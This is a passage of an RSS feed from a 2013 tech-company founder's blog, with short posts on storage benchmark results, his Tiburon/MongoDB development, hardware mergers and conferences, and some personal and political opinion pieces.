      <description>So I ran out of space on my travel laptop&amp;rsquo;s small SSD. I wanted to update to a larger SSD, and I figured I&amp;rsquo;d move my partitions over and resize. But the gods would not allow for such an operation as they have in the past. Oh no. Upon switching out the 120 GB Intel SSD for the 240 GB SSD (a spare unit we had), and putting the 120 GB SSD into a USB 3 holder, I discovered that a) the drive wouldn&amp;rsquo;t register with the machine most of the time (it errored out during SCSI plugin detection), or b) when it did detect properly, it wouldn&amp;rsquo;t provide partitions I could copy off.</description>
    </item>
    
    <item>
      <title>Our little time series analytical appliance is one fast monster</title>
      <link>https://blog.scalability.org/2013/10/our-little-time-series-analytical-appliance-is-one-fast-monster/</link>
      <pubDate>Mon, 21 Oct 2013 17:43:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/our-little-time-series-analytical-appliance-is-one-fast-monster/</guid>
      <description>Running some burn in testing:
Run status group 0 (all jobs): READ: io=523296MB, aggrb=12093MB/s, minb=12093MB/s, maxb=12093MB/s, mint=43274msec, maxt=43274msec WRITE: io=523296MB, aggrb=7469.4MB/s, minb=7469.4MB/s, maxb=7469.4MB/s, mint=70059msec, maxt=70059msec  More soon</description>
    </item>
    
    <item>
      <title>This week past has been (mostly) incredible</title>
      <link>https://blog.scalability.org/2013/10/this-week-past-has-been-mostly-incredible/</link>
      <pubDate>Sun, 20 Oct 2013 15:24:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/this-week-past-has-been-mostly-incredible/</guid>
      <description>Feeling not happy about my time away from my family, and not happy about Vipin&amp;rsquo;s time away from his, we still accomplished a great deal. Some unhappy things I still have to deal with, and I will soon. But this has been a great week. Look for some announcements around the SC13 show. We will have some nice things to talk about at our booth (#1919 , please do come and visit us there, we will have coffee, snacks, as well as our team, partners, and friends there!</description>
    </item>
    
    <item>
      <title>And the benchmarks are out</title>
      <link>https://blog.scalability.org/2013/10/and-the-benchmarks-are-out/</link>
      <pubDate>Wed, 16 Oct 2013 03:39:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/and-the-benchmarks-are-out/</guid>
      <description>Check out the official site for more info. Take-home messages for the soon-to-be-announced system:
and
What is this magical beast you ask? What are its configuration limits? You&amp;rsquo;ll have to wait for the official unveiling.</description>
    </item>
    
    <item>
      <title>New benchmark results imminent</title>
      <link>https://blog.scalability.org/2013/10/new-benchmark-results-imminent/</link>
      <pubDate>Mon, 14 Oct 2013 17:40:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/new-benchmark-results-imminent/</guid>
      <description>Will update once they are released. I can&amp;rsquo;t tell you numbers within. I can say that we are quite happy with the results. More (very) soon. I promise.</description>
    </item>
    
    <item>
      <title>Heh ...</title>
      <link>https://blog.scalability.org/2013/10/heh/</link>
      <pubDate>Fri, 11 Oct 2013 22:55:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/heh/</guid>
      <description>[ ![](/images/eunuch programmers.jpg)
](http://www.businessinsider.com/scott-adams-favorite-dilbert-comics-2013-10)</description>
    </item>
    
    <item>
      <title>This would be funny if it weren&#39;t sad</title>
      <link>https://blog.scalability.org/2013/10/this-would-be-funny-if-it-werent-sad/</link>
      <pubDate>Thu, 10 Oct 2013 16:43:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/this-would-be-funny-if-it-werent-sad/</guid>
      <description>Over on the pfSense mailing list there is a serious level of tin-foil-hat (TFH) and rampant paranoia, coupled with extreme lack of etiquette on the part of the TFH brigade. And, to make it more enjoyable, at least one overt and humorous case of attempted cyber bullying against me personally for imploring people to stop hijacking a technical discussion list, as well as people decrying a faux oppression from people who genuinely want the list to return to its technical roots.</description>
    </item>
    
    <item>
      <title>Oh dear lord</title>
      <link>https://blog.scalability.org/2013/10/oh-dear-lord/</link>
      <pubDate>Mon, 07 Oct 2013 23:30:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/oh-dear-lord/</guid>
      <description>Let&amp;rsquo;s see if this actually materializes. It&amp;rsquo;s pretty obvious how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition can be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straightforward definition in the US Constitution.</description>
    </item>
    
    <item>
      <title>Starting to build the Tiburon Data Store</title>
      <link>https://blog.scalability.org/2013/10/starting-to-build-the-tiburon-data-store/</link>
      <pubDate>Sat, 05 Oct 2013 16:39:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/starting-to-build-the-tiburon-data-store/</guid>
      <description>This is fun, basically something that I&amp;rsquo;ve wanted to do, and it gets me closer to the point where I&amp;rsquo;ve wanted to be for a while &amp;hellip; building TREDS (Tiburon REliable Data Store). Code is up in the IDE, and I am building the CRUD and metadata portions now. If all goes well (it never does), we should be storing/retrieving objects soon. Very exciting &amp;hellip;</description>
    </item>
    
    <item>
      <title>You get what you vote for</title>
      <link>https://blog.scalability.org/2013/10/you-get-what-you-vote-for/</link>
      <pubDate>Sat, 05 Oct 2013 14:26:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/you-get-what-you-vote-for/</guid>
      <description>This is sad.
Here are the really sad parts of this:
 Not only did they close the parks, but they turned off the web sites. The park employees are being ordered to make life as hard as possible for the patrons. None of this had to happen. Had the Democrats decided that, ya know, in a political environment negotiation is the key to advancing agendas, and not a scorched-earth strategy, chances are they would have been able to get some of what they wanted.</description>
    </item>
    
    <item>
      <title>More benchmarking goodness coming</title>
      <link>https://blog.scalability.org/2013/10/more-benchmarking-goodness-coming/</link>
      <pubDate>Fri, 04 Oct 2013 21:21:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/more-benchmarking-goodness-coming/</guid>
      <description>A new round of industry standard benchmarks coming soon for some of our kit. Well, it&amp;rsquo;s technically our appliance built from that platform, but you&amp;rsquo;ll be hearing more on that soon. Very exciting times &amp;hellip;</description>
    </item>
    
    <item>
      <title>Moving more of our infrastructure to our dog food ...</title>
      <link>https://blog.scalability.org/2013/10/moving-more-of-our-infrastructure-to-our-dog-food/</link>
      <pubDate>Tue, 01 Oct 2013 15:53:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/moving-more-of-our-infrastructure-to-our-dog-food/</guid>
      <description>Many of our functions are hosted on our Virtualization appliance. Our firewall is now running on a siRouter appliance. As always, our internal storage is JackRabbit, and our internal backup is DeltaV. We&amp;rsquo;ll be talking more about all of this in short order. Needless to say, I am quite pleased about this. [update] Spoke too soon &amp;hellip; discovered a routing failure that was masked in the appliance. Reverting to the old setup until we can address it.</description>
    </item>
    
    <item>
      <title>Dead on correct article</title>
      <link>https://blog.scalability.org/2013/09/dead-on-correct-article/</link>
      <pubDate>Fri, 27 Sep 2013 16:13:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/dead-on-correct-article/</guid>
      <description>What many of us worried about years ago was whether or not we were electing an empty suit to the highest political office in the land. Someone with no experience running anything. With no great accomplishments upon which to build. Simply a moderate orator with a teleprompter. 5 years in, our worst fears don&amp;rsquo;t even appear to scratch the surface of the failure that we have brought upon ourselves. This piece at the Wall Street Journal is so completely spot on.</description>
    </item>
    
    <item>
      <title>Wonderful changes in Tiburon-RESTful</title>
      <link>https://blog.scalability.org/2013/09/wonderful-changes-in-tiburon-restful/</link>
      <pubDate>Sun, 22 Sep 2013 18:51:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/wonderful-changes-in-tiburon-restful/</guid>
      <description>I&amp;rsquo;ve been rewriting Tiburon to provide a completely sane restful interface. It still does what it did before, but now &amp;hellip; it does it so much more nicely! First: I got rid of the config file. Some folks were having trouble with JSON config files. Creating them is very easy: they are key-value stores in 90% of the cases, with the remaining 10% being a &amp;ldquo;default&amp;rdquo; key, and then the value.</description>
    </item>
    
    <item>
      <title>RESTful tiburon tagged</title>
      <link>https://blog.scalability.org/2013/09/restful-tiburon-tagged/</link>
      <pubDate>Sat, 21 Sep 2013 19:29:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/restful-tiburon-tagged/</guid>
      <description>as Alaskan Malamute v0.10. I&amp;rsquo;m a dog guy, what can I say. Hopefully full boot server semantics will be done by end of weekend.</description>
    </item>
    
    <item>
      <title>Starting to really enjoy using MongoDB as a document store</title>
      <link>https://blog.scalability.org/2013/09/starting-to-really-enjoy-using-mongodb-as-a-document-store/</link>
      <pubDate>Sat, 21 Sep 2013 17:13:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/starting-to-really-enjoy-using-mongodb-as-a-document-store/</guid>
      <description>There are a few gotchas that I am working through. But apart from these (mostly oddities in the interface between Perl and MongoDB), this is making Tiburon RESTful development go much better. I&amp;rsquo;ve just started to scratch the surface of what the combined thing will do.
landman@lightning:~/work/development/tiburon/t$ ./version.pl result = $VAR1 = &#39;{ &amp;quot;version&amp;quot; : &amp;quot;0.1&amp;quot;, &amp;quot;label&amp;quot; : &amp;quot;Alaskan Malamute&amp;quot; }&#39;;  and
landman@lightning:~/work/development/tiburon/t$ ./list_boot_servers.pl result = $VAR1 = &#39; [ { &amp;quot;hostport&amp;quot; : &amp;quot;3001&amp;quot;, &amp;quot;_id&amp;quot; : &amp;quot;523d540e9745f48429000000&amp;quot;, &amp;quot;name&amp;quot; : &amp;quot;test1&amp;quot;, &amp;quot;default&amp;quot; : &amp;quot;false&amp;quot;, &amp;quot;hostname&amp;quot; : &amp;quot;10.</description>
    </item>
    
    <item>
      <title>Ahhh ... the joy that is being used as a 2 by 4</title>
      <link>https://blog.scalability.org/2013/09/ahhh-the-joy-that-is-being-used-as-a-2-by-4/</link>
      <pubDate>Fri, 20 Sep 2013 18:15:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/ahhh-the-joy-that-is-being-used-as-a-2-by-4/</guid>
      <description>I didn&amp;rsquo;t quite see this one in all its glory, but had an inkling that things were not as they appeared to be. Annoying, but one lives, learns, and continues. No details.</description>
    </item>
    
    <item>
      <title>... and Nirvanix shutters ...</title>
      <link>https://blog.scalability.org/2013/09/and-nirvanix-shutters/</link>
      <pubDate>Tue, 17 Sep 2013 21:07:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/and-nirvanix-shutters/</guid>
      <description>Traction, paying customers, revenue and cashflow are what matter to small businesses looking to grow up. In many ways we (the day job) were lucky as we built a sustainable business first, with real customers and real revenue. Most startups don&amp;rsquo;t do that. They have a change the world idea, and then try to evangelize this whilst building a business. Sometimes they have to &amp;ldquo;pivot&amp;rdquo; or &amp;hellip; change focus to an idea that will work at turning into a business.</description>
    </item>
    
    <item>
      <title>Worlds first low latency cloud</title>
      <link>https://blog.scalability.org/2013/09/worlds-first-low-latency-cloud/</link>
      <pubDate>Tue, 17 Sep 2013 14:12:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/worlds-first-low-latency-cloud/</guid>
      <description>PR from the day job. Remember I&amp;rsquo;ve been dying to tell people about the ultra cool project we&amp;rsquo;ve been working on for the last year? Well, this is it. More soon, but I am thrilled we can talk about it now!</description>
    </item>
    
    <item>
      <title>Why is Java used in teaching programming in high schools?</title>
      <link>https://blog.scalability.org/2013/09/why-is-java-used-in-teaching-programming-in-high-schools/</link>
      <pubDate>Mon, 16 Sep 2013 03:29:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/why-is-java-used-in-teaching-programming-in-high-schools/</guid>
      <description>Seriously &amp;hellip; My daughter is taking a computer class, and for reasons I cannot fathom, they are using an AP Java book (an old one at that, written when Java 5 was new), and more importantly and more concerningly, the Java language itself. I&amp;rsquo;ve got many qualms about using Java for teaching (or development, but that&amp;rsquo;s for other posts). For new students, early exposure to its rigid and verbose &amp;hellip; one might argue &amp;hellip; excessively verbose &amp;hellip; syntax and structure doesn&amp;rsquo;t quite lend itself to an understanding of how algorithms and computers work.</description>
    </item>
    
    <item>
      <title>Slight annoyance with argument processing</title>
      <link>https://blog.scalability.org/2013/09/slight-annoyance-with-argument-processing/</link>
      <pubDate>Mon, 16 Sep 2013 01:25:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/slight-annoyance-with-argument-processing/</guid>
      <description>Tiburon as a service. I&amp;rsquo;ll talk about this at some point, and describe what I mean, but I have to say that I&amp;rsquo;ve been blown away by the response to it from many places and customers. I&amp;rsquo;ve been working on making the API restful, and finally &amp;hellip; finally &amp;hellip; incorporating a noSQL DB on the back end to make the replication and other bits trivial. We are using MongoDB for this.</description>
    </item>
    
    <item>
      <title>Bitten by VirtualBox yet again, moving to kvm</title>
      <link>https://blog.scalability.org/2013/09/bitten-by-virtualbox-yet-again-moving-to-kvm/</link>
      <pubDate>Thu, 12 Sep 2013 20:55:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/bitten-by-virtualbox-yet-again-moving-to-kvm/</guid>
      <description>I like VirtualBox. Have for a long time. But it has some &amp;hellip; well &amp;hellip; interesting failure modes. Including some that have locked up my host machine. The problem for me is that I&amp;rsquo;ve got my Windows desktop environment for my normal desktop hosted there. And I need this every now and then. Today was the final straw: working on a document about some of our updates in Word. I don&amp;rsquo;t like Word, but some of our partners use it, and it&amp;rsquo;s easier to use it than to fight the battle of convincing them to use LibreOffice.</description>
    </item>
    
    <item>
      <title>More M&amp;A</title>
      <link>https://blog.scalability.org/2013/09/more-ma-2/</link>
      <pubDate>Tue, 10 Sep 2013 17:32:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/more-ma-2/</guid>
      <description>Two items.
Our friends at Virident are now part of WD. I am happy Kumar, Yatin and crew got a nice exit. I am not thrilled at where they landed. Virident joins STEC at WD. But as with STEC, it looks like this is on the HGST side of things, which appears to still be building separate and quality product. We will buy and ship HGST. Whiptail was acquired by Cisco.</description>
    </item>
    
    <item>
      <title>Special at the party after HPC on Wall Street</title>
      <link>https://blog.scalability.org/2013/09/special-at-the-party-after-hpc-on-wall-street/</link>
      <pubDate>Sat, 07 Sep 2013 03:02:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/special-at-the-party-after-hpc-on-wall-street/</guid>
      <description>The world&amp;rsquo;s first low latency drink, to go with the next generation low latency cloud &amp;hellip; the Scalable low latentini. Yes, it&amp;rsquo;s real &amp;hellip;</description>
    </item>
    
    <item>
      <title>Day job at HPC on Wall Street on Monday the 9th</title>
      <link>https://blog.scalability.org/2013/09/day-job-at-hpc-on-wall-street-on-monday-the-9th/</link>
      <pubDate>Fri, 06 Sep 2013 20:12:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/day-job-at-hpc-on-wall-street-on-monday-the-9th/</guid>
      <description>We&amp;rsquo;ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think &amp;lsquo;bloody fast NAT&amp;rsquo; and SDN in general; you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, Hadoop-like workloads, and other similar workloads more commonly used on other well known platforms.</description>
    </item>
    
    <item>
      <title>Definitely having one of those days</title>
      <link>https://blog.scalability.org/2013/09/definitely-having-one-of-those-days/</link>
      <pubDate>Fri, 06 Sep 2013 19:49:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/definitely-having-one-of-those-days/</guid>
      <description>Massive frustration on multiple fronts, and a few unwelcome surprises. I wish I had karate tonight, and fight night in particular. Lots to work off. I&amp;rsquo;ll have to be satisfied with weight training tomorrow, and a nice long dog walk tonight.</description>
    </item>
    
    <item>
      <title>More M&amp;A:  Microsoft buys Nokia</title>
      <link>https://blog.scalability.org/2013/09/more-ma-microsoft-buys-nokia/</link>
      <pubDate>Tue, 03 Sep 2013 04:44:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/more-ma-microsoft-buys-nokia/</guid>
      <description>This one was almost obvious; it was simply a matter of &amp;ldquo;when&amp;rdquo;. Microsoft is trying to put some wood behind its Mobile OS arrow. No one seems to want it, save for the 41MP camera &amp;ldquo;phone&amp;rdquo;. In the big picture, Microsoft saw the beginning of an erosion of its market power recently, as more people opted for mobile platforms, and fewer opted for PCs and laptops. There is a convenience and cost play going on at the same time.</description>
    </item>
    
    <item>
      <title>Latest DeltaV benchmarks</title>
      <link>https://blog.scalability.org/2013/09/latest-deltav-benchmarks/</link>
      <pubDate>Sun, 01 Sep 2013 21:08:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/latest-deltav-benchmarks/</guid>
      <description>24 bay system, big RAID6. Reads/writes at 4x RAM size.
[root@dv4-3 ~]# df -h /data
Filesystem      Size  Used Avail Use% Mounted on
/dev/md2         55T   65G   55T   1% /data
...
WRITE: io=65505MB, aggrb=1580.2MB/s, minb=1580.2MB/s, maxb=1580.2MB/s, mint=41433msec, maxt=41433msec
READ: io=65505MB, aggrb=2429.4MB/s, minb=2429.4MB/s, maxb=2429.4MB/s, mint=26964msec, maxt=26964msec</description>
    </item>
    
    <item>
      <title>Spot on discussion of a fake crisis</title>
      <link>https://blog.scalability.org/2013/09/spot-on-discussion-of-a-fake-crisis/</link>
      <pubDate>Sun, 01 Sep 2013 20:14:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/spot-on-discussion-of-a-fake-crisis/</guid>
      <description>Over at IEEE Spectrum, there is a wonderful article that delves into the latest phase of the alleged massive need for more STEM workers. This is a topic I&amp;rsquo;ve covered a number of times, here, here, here, and here. TL;DR version for newbies: If someone is trying to sell you on this to get you to decide to go get a STEM degree, then there&amp;rsquo;s a pretty good probability you are in the process of being deceived.</description>
    </item>
    
    <item>
      <title>Why I&#39;ve not been posting</title>
      <link>https://blog.scalability.org/2013/08/why-ive-not-been-posting/</link>
      <pubDate>Sat, 31 Aug 2013 15:39:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/why-ive-not-been-posting/</guid>
      <description>Just insanely busy, more so than usual. We are getting close to double digits in employees in the day job. I suspect we&amp;rsquo;ll cross this in September/October. More news soon, including some wonderful new partners, products, and business bits. I won&amp;rsquo;t say where at this moment, but you can start searching around for the SI logo on a few folks sites &amp;hellip;</description>
    </item>
    
    <item>
      <title>Entrepreneurs are optimists</title>
      <link>https://blog.scalability.org/2013/08/entrepreneurs-are-optimists/</link>
      <pubDate>Sat, 31 Aug 2013 15:35:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/entrepreneurs-are-optimists/</guid>
      <description>This is something I&amp;rsquo;ve been meaning to write about for a while. There are many reasons one might decide to be an entrepreneur. For me the journey was fairly simple. In graduate school, I saw the sea change in my field with the influx of FSU scientists with much greater seniority, many more publications, etc. taking up postdoc and tenure track positions around the time I finished up. I knew I had to alter my vision of what I wanted to do in my professional career, and happily SGI came along and gave me the opportunity to spend time in industry.</description>
    </item>
    
    <item>
      <title>Day job at HPC on Wall Street</title>
      <link>https://blog.scalability.org/2013/08/day-job-at-hpc-on-wall-street/</link>
      <pubDate>Sat, 31 Aug 2013 14:58:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/day-job-at-hpc-on-wall-street/</guid>
      <description>Ok, this is getting to be a common theme. We go to HPC on Wall Street. We show off new kit. And we are hosting a party. Go figure. There will be more on this very soon. You will see the new kit at our new large booth at SC13. The first element of the new kit is a software defined networking powerhouse behind a new global financial cloud. The group building out the cloud will be there with us, ready to talk to people about what they are doing, and why financial types should sign up for this cloud.</description>
    </item>
    
    <item>
      <title>NextIO shuts its doors and liquidates</title>
      <link>https://blog.scalability.org/2013/08/nextio-shuts-its-doors-and-liquidates/</link>
      <pubDate>Mon, 26 Aug 2013 14:01:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/nextio-shuts-its-doors-and-liquidates/</guid>
      <description>As seen here and here.
There are lessons to be learned, and wisdom to be had, from the articles. As the founder noted</description>
    </item>
    
    <item>
      <title>I have finally given in to the borg collective</title>
      <link>https://blog.scalability.org/2013/08/i-have-finally-given-in-to-the-borg-collective/</link>
      <pubDate>Mon, 19 Aug 2013 03:31:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/i-have-finally-given-in-to-the-borg-collective/</guid>
      <description>I am now on Facebook. Turns out my family and all my friends are there, so &amp;hellip; &amp;hellip; how soon before we have to change for the next great social network platform? I&amp;rsquo;ve got more than one Twitter account (@sijoe and @scalableinfo), a LinkedIn account, a Google+ account (that for the life of me I can&amp;rsquo;t really figure out), and now Facebook. Not to mention 2 blogs (here and at work).</description>
    </item>
    
    <item>
      <title>bitten yet again by ancient packages in CentOS (and RHEL)</title>
      <link>https://blog.scalability.org/2013/08/bitten-yet-again-by-ancient-packages-in-centos-and-rhel/</link>
      <pubDate>Sun, 11 Aug 2013 00:51:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/bitten-yet-again-by-ancient-packages-in-centos-and-rhel/</guid>
      <description>This is not a CentOS issue, in that they merely rebuild the RHEL sources without the copyrighted bits. But it&amp;rsquo;s getting to the point where the RHEL bits are so badly out of date that the platform is rapidly becoming unusable. When I have to rebuild packages from source, as no up-to-date patched source RPM or even binary RPM exists for little used packages such as, I dunno &amp;hellip; apache?</description>
    </item>
    
    <item>
      <title>When you cross the rubicon</title>
      <link>https://blog.scalability.org/2013/08/when-you-cross-the-rubicon/</link>
      <pubDate>Sat, 10 Aug 2013 03:22:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/when-you-cross-the-rubicon/</guid>
      <description>&amp;hellip; from hobby and sport, to something more. I&amp;rsquo;ve traveled 1k miles for karate tournaments (to participate). I have not, as of yet, crossed an international border for one. That changes tomorrow. I went through a promotion test last week with an injured intercostal muscle. This caused all sorts of joy &amp;hellip; no really &amp;hellip; and had me think that I had a serious kidney stone flare up. The pain was in the same region, and toradol helped, which drew me to a rapid, and incorrect conclusion as to the pain.</description>
    </item>
    
    <item>
      <title>how not to write driver Makefiles or configuration scripts</title>
      <link>https://blog.scalability.org/2013/08/how-not-to-write-driver-makefiles-or-configuration-scripts/</link>
      <pubDate>Tue, 06 Aug 2013 22:43:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/how-not-to-write-driver-makefiles-or-configuration-scripts/</guid>
      <description>if [uname -r eq ...] It&amp;rsquo;s very bad form to insist on very particular versions of an OS/kernel. Not only will you piss off your customer (me), you will cause a great deal of effort to unwind the ill-considered test in order to get even basic functionality. I&amp;rsquo;ve seen this on network cards, RAID cards, you name it. It increases your support load, and decreases the likelihood that you can actually support what&amp;rsquo;s out there &amp;hellip; say, for example, someone does a &amp;lsquo;yum update&amp;rsquo; and gets an updated kernel.</description>
    </item>
    
    <item>
      <title>Day job blog on turning 11 is up</title>
      <link>https://blog.scalability.org/2013/08/day-job-blog-on-turning-11-is-up/</link>
      <pubDate>Thu, 01 Aug 2013 17:13:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/day-job-blog-on-turning-11-is-up/</guid>
      <description>Here. We are looking forward to the next 11 years :D</description>
    </item>
    
    <item>
      <title>A cri de coeur for Perl</title>
      <link>https://blog.scalability.org/2013/07/a-cri-de-couer-for-perl/</link>
      <pubDate>Wed, 31 Jul 2013 16:41:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/a-cri-de-couer-for-perl/</guid>
      <description>As seen here. I enjoy developing code in Perl. I know, I know, it&amp;rsquo;s &amp;ldquo;the write-only language&amp;rdquo; and it &amp;ldquo;looks like line noise&amp;rdquo;. It has endured some rather nasty FUD in its day, and yet it keeps on growing in use. It is just an incredibly powerful, quite expressive language, one which enables you to write very terse code if you wish. But the presentation isn&amp;rsquo;t concerned with terseness; it is concerned with Perl&amp;rsquo;s development into a modern programming language.</description>
    </item>
    
    <item>
      <title>The day job is 11 years old</title>
      <link>https://blog.scalability.org/2013/07/the-day-job-is-11-years-old/</link>
      <pubDate>Wed, 31 Jul 2013 13:52:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/the-day-job-is-11-years-old/</guid>
      <description>Last year at this time, I had been incensed by a US presidential candidate, and the mindset behind him, who told me, and every other entrepreneur out there, that &amp;ldquo;we didn&amp;rsquo;t build it&amp;rdquo;. It was a foolish thing for him to say, and foolish for his party and fellow travelers to echo. Yet echo it they did. I quietly promised myself to double down on my hard work, the work I did, and see if I could smash the previous year&amp;rsquo;s smashing financial records.</description>
    </item>
    
    <item>
      <title>and the M&amp;A accelerates</title>
      <link>https://blog.scalability.org/2013/07/and-the-ma-accelerates/</link>
      <pubDate>Tue, 30 Jul 2013 10:39:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/and-the-ma-accelerates/</guid>
      <description>NVidia grabs the Portland Group. This makes sense, as NVidia has had CUDA, which is LLVM-based, and needed a more general purpose compiler technology. There is nothing wrong with CUDA, but it&amp;rsquo;s very GPU-specific. PGI tech allows them to talk very generally, and get support for non-GPU hardware acceleration. Such as massive collections of ARM. I expect more M&amp;amp;A and investment activity over the next few months.</description>
    </item>
    
    <item>
      <title>One of the joys of running a company</title>
      <link>https://blog.scalability.org/2013/07/one-of-the-joys-of-running-a-company/</link>
      <pubDate>Mon, 22 Jul 2013 20:45:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/one-of-the-joys-of-running-a-company/</guid>
      <description>&amp;hellip; is when large multi-hundred million or multi-billion dollar public companies try to ignore &amp;ldquo;small&amp;rdquo; bills from smaller than multi-hundred million dollar companies. Very much related to this. We are operationally funded. Every dollar I pay my team with comes from cash flow. So when companies try to cheat us out of money by not paying their bills, and then ignore our requests for payment &amp;hellip; Yeah, this gets old. I prodded a reseller on this pretty hard today.</description>
    </item>
    
    <item>
      <title>Part of the reason why Detroit has a long rough road ahead</title>
      <link>https://blog.scalability.org/2013/07/part-of-the-reason-why-detroit-has-a-long-rough-road-ahead/</link>
      <pubDate>Fri, 19 Jul 2013 23:36:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/part-of-the-reason-why-detroit-has-a-long-rough-road-ahead/</guid>
      <description>is due, in significant part, to bad law and bad policy enshrined in law. Ideological viewpoints are hard coded in the firmware of Michigan. Which allows lawsuits and results such as this. It cannot be overemphasized how bone-headed this particular law is: that one can never, under any circumstances, reduce pensioner benefit values. This means that if you ever struck a bad deal, as Detroit, and many others in Michigan, have, you have no choice but to continue this bad deal for eternity.</description>
    </item>
    
    <item>
      <title>... and bang goes Detroit ...</title>
      <link>https://blog.scalability.org/2013/07/and-bang-goes-detroit/</link>
      <pubDate>Thu, 18 Jul 2013 21:30:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/and-bang-goes-detroit/</guid>
      <description>This brings me no joy. I went to grad school in Detroit. I like this city. It has character, it has guts, it has potential. It also has no cash to continue operations. And that sucks. Detroit filed for chapter 9 bankruptcy a few hours ago. There are many reasons for this, but there are a number of specific ones, that are generalizable to businesses as well. First, population decline has led to a tax revenue decline.</description>
    </item>
    
    <item>
      <title>Dear NSA PRISM folks, we have a problem we need your help with</title>
      <link>https://blog.scalability.org/2013/07/dear-nsa-prism-folks-we-have-a-problem-we-need-your-help-with/</link>
      <pubDate>Tue, 16 Jul 2013 20:48:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/dear-nsa-prism-folks-we-have-a-problem-we-need-your-help-with/</guid>
      <description>A scammer has been spoofing the day job&amp;rsquo;s number for the last year and a half. We&amp;rsquo;ve been trying &amp;hellip; very hard &amp;hellip; to get anyone at all to cooperate with us to find out who these losers are, so we can take them out. We have had no luck. No one wants to help. No one. Even execs at phone companies. Go figure. One kid called last year so incensed that his mother was targeted by the scammers that he said he was going to get a gun and go meet with these jokers.</description>
    </item>
    
    <item>
      <title>Another bucket list item</title>
      <link>https://blog.scalability.org/2013/07/another-bucket-list-item/</link>
      <pubDate>Fri, 05 Jul 2013 00:48:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/another-bucket-list-item/</guid>
      <description>On my vacation in NY recently, I happened to be able to tick off another item on my bucket list. There&amp;rsquo;s some background to it, but here are the pics.
[ ](/images/IMG_1454.JPG)
[ ](/images/IMG_1456.JPG)
and
[ ](/images/IMG_1459.JPG)
The background to this is a short story I&amp;rsquo;ve been working on for a while. A near-future serum run, in effect. It should be done very soon, though I&amp;rsquo;ve been working on it in very short bursts.</description>
    </item>
    
    <item>
      <title>M&amp;A roundup</title>
      <link>https://blog.scalability.org/2013/07/ma-roundup/</link>
      <pubDate>Tue, 02 Jul 2013 16:58:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/ma-roundup/</guid>
      <description>I&amp;rsquo;ve not reported it, but STEC was acquired by Western Digital. STEC has been one of the day job&amp;rsquo;s partners for high performance SSD technology. Unfortunately, we&amp;rsquo;ve not had great luck with WD in the past. We even went so far as to recall/replace specific models from every machine shipped globally with those drives, due to very high failure rates, and a complete unwillingness on the part of WD to either admit defective firmware, or RMA defective drives.</description>
    </item>
    
    <item>
      <title>ISC13 video</title>
      <link>https://blog.scalability.org/2013/06/isc13-video/</link>
      <pubDate>Thu, 27 Jun 2013 18:55:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/isc13-video/</guid>
      <description>[vacation edition: posted from an undisclosed location somewhere off 9A in Fishkill NY, after leaving a really bad airbnb experience in Scarsdale NY] Here Russell from Scalable Informatics and Rich from InsideHPC (check em out!) talk about STAC M3 benchmarks, siCloud (aka &amp;lsquo;the beast&amp;rsquo;), and some of the capability class tests we ran. More later, but I am on vacation &amp;hellip;</description>
    </item>
    
    <item>
      <title>Very fast cloud scale tightly coupled computing and storage</title>
      <link>https://blog.scalability.org/2013/06/very-fast-cloud-scale-tightly-coupled-computing-and-storage/</link>
